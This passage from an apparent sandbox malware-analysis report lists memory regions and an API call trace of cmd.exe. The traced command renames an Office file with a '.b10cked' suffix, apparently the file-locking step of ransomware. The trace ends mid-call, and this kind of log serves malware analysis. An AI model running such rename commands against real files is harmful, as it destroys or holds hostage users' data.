region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23766 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23767 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23768 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 23769 
start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23770 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 23771 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23772 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23773 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23774 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23775 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 23776 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 23777 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 23778 start_va = 0x773e0000 end_va = 
0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 23779 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 23780 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 23781 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 23782 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23783 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 23784 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 23785 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 23786 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 23787 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 23788 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 23789 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001130000" filename = "" Thread: id = 404 os_tid = 0xa74 [0173.665] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff44 | out: lpSystemTimeAsFileTime=0x12ff44*(dwLowDateTime=0x9d686c00, dwHighDateTime=0x1d440a9)) [0173.665] GetCurrentProcessId () returned 0xac0 [0173.665] GetCurrentThreadId () returned 0xa74 [0173.665] GetTickCount () returned 0x328d4 [0173.665] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff3c | out: lpPerformanceCount=0x12ff3c*=23045459962) returned 1 [0173.666] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0173.666] __set_app_type (_Type=0x1) [0173.666] __p__fmode () returned 0x76b331f4 [0173.666] __p__commode () returned 0x76b331fc [0173.666] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0173.666] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0173.666] GetCurrentThreadId () returned 0xa74 [0173.666] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa74) returned 0x38 [0173.666] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.667] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0173.667] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.667] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0173.667] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fed4 | out: phkResult=0x12fed4*=0x0) returned 0x2 [0173.667] VirtualQuery (in: lpAddress=0x12ff0b, lpBuffer=0x12fea4, dwLength=0x1c | out: lpBuffer=0x12fea4*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.667] VirtualQuery (in: 
lpAddress=0x30000, lpBuffer=0x12fea4, dwLength=0x1c | out: lpBuffer=0x12fea4*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0173.667] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fea4, dwLength=0x1c | out: lpBuffer=0x12fea4*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0173.667] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12fea4, dwLength=0x1c | out: lpBuffer=0x12fea4*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.667] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fea4, dwLength=0x1c | out: lpBuffer=0x12fea4*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0173.667] GetConsoleOutputCP () returned 0x1b5 [0173.667] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.667] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0173.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.667] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0173.667] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.667] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.668] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.668] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.668] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.668] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.668] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.668] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0173.668] GetEnvironmentStringsW () returned 0x1b0210* [0173.668] FreeEnvironmentStringsW 
(penv=0x1b0210) returned 1 [0173.668] GetEnvironmentStringsW () returned 0x1b0210* [0173.669] FreeEnvironmentStringsW (penv=0x1b0210) returned 1 [0173.669] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ee44 | out: phkResult=0x12ee44*=0x40) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0xa0, lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x1, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0x1, lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x0, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x40, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x40, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0x40, 
lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegCloseKey (hKey=0x40) returned 0x0 [0173.669] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12ee44 | out: phkResult=0x12ee44*=0x40) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0x40, lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x1, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0x1, lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x0, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x9, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x4, lpData=0x12ee50*=0x9, lpcbData=0x12ee48*=0x4) returned 0x0 [0173.669] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12ee4c, lpData=0x12ee50, lpcbData=0x12ee48*=0x1000 | out: lpType=0x12ee4c*=0x0, lpData=0x12ee50*=0x9, lpcbData=0x12ee48*=0x1000) returned 0x2 [0173.669] RegCloseKey (hKey=0x40) 
returned 0x0 [0173.669] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0173.669] srand (_Seed=0x5b886389) [0173.669] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked\"" [0173.669] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked\"" [0173.670] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.670] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1b1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.670] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.670] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.670] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.670] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.670] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.670] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.670] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.670] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.670] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.670] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0173.670] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.670] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.670] GetEnvironmentStringsW () returned 0x1b2360* [0173.671] FreeEnvironmentStringsW (penv=0x1b2360) returned 1 [0173.671] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.671] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.671] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.671] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.671] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.671] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.671] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.671] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.671] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.671] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.671] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12fc10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.671] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x12fc10, lpFilePart=0x12fc0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x12fc0c*="Desktop") returned 0x18 [0173.671] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.671] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f98c | out: lpFindFileData=0x12f98c) returned 0x1b09f0 [0173.671] FindClose (in: hFindFile=0x1b09f0 | out: hFindFile=0x1b09f0) returned 1 [0173.671] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x12f98c | out: lpFindFileData=0x12f98c) returned 0x1b09f0 [0173.672] FindClose (in: 
hFindFile=0x1b09f0 | out: hFindFile=0x1b09f0) returned 1 [0173.672] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x12f98c | out: lpFindFileData=0x12f98c) returned 0x1b09f0 [0173.672] FindClose (in: hFindFile=0x1b09f0 | out: hFindFile=0x1b09f0) returned 1 [0173.672] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.672] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.672] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.672] GetEnvironmentStringsW () returned 0x1b0210* [0173.672] FreeEnvironmentStringsW (penv=0x1b0210) returned 1 [0173.672] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.673] GetConsoleOutputCP () returned 0x1b5 [0173.673] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.673] GetUserDefaultLCID () returned 0x409 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12fd50, cchData=128 | out: lpLCData="0") returned 2 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12fd50, cchData=128 | out: lpLCData="0") returned 2 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x12fd50, cchData=128 | out: lpLCData="1") returned 2 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.673] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.674] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.674] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.674] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.674] GetConsoleTitleW (in: lpConsoleTitle=0x1a0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.674] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.675] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.675] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.675] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.675] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.675] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.675] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.675] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.675] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.675] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.675] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.680] GetConsoleTitleW (in: lpConsoleTitle=0x12fa48, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.680] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.680] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.680] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.680] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.680] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.680] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.680] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.680] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.680] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.680] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.680] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.680] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.680] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.680] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.680] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.680] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.680] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.680] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.680] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.680] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.681] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.681] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.681] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.681] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.681] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.681] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.681] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.681] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.681] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0173.681] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.681] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.681] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.681] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.681] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.681] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.683] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f804, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f7fc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f7fc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.683] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.684] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.685] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.685] _wcsicmp (_String1="STINTL~1.TRX", _String2=".") 